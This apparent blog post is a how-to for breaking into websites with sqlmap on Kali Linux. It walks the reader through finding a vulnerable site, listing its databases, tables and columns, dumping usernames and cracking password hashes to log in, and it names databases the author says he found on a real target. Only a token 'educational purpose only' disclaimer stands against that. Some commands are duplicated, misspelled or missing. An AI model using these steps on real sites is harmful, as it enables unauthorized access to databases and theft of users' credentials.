How to hack the Website with sqlmap(kali linux)?
- yuddha

- Feb 2, 2019
- 1 min read
Updated: Feb 3, 2019
At the first step you need to boot with kali and find the vulnarable website to start.
1. Open up the terminal and type "sqlmap -h" for help.
2. And type the following
sqlmap sqlmap -u "website urlshould be here" --dbs
it will load the database if the site is vulnarable.
3. sqlmap -u "website urlshould be here" -D education --tables
(education is the database I found) This will load all info of these selected database
4 sqlmap -u "website urlshould be here" -D angelvest_china -T db_user --column
(db_user is the table I found)
5. Now you need to select a column by typing:
(username is the name of the column that I found)
Now it will dump the information in the column username and: you've hacked it! (On that site there is a column called passwords too so you just need to decrypt the hashes in that column and boom! You can login.)
Congrats! You've just hacked a website with sqlmap! If you liked the instructable you should take a look at my other instructables too! Stay tuned for more!
At the end i would like to say that this is for educational purpose only. If any illegal activities you did then i will not be responsible for that.




Comments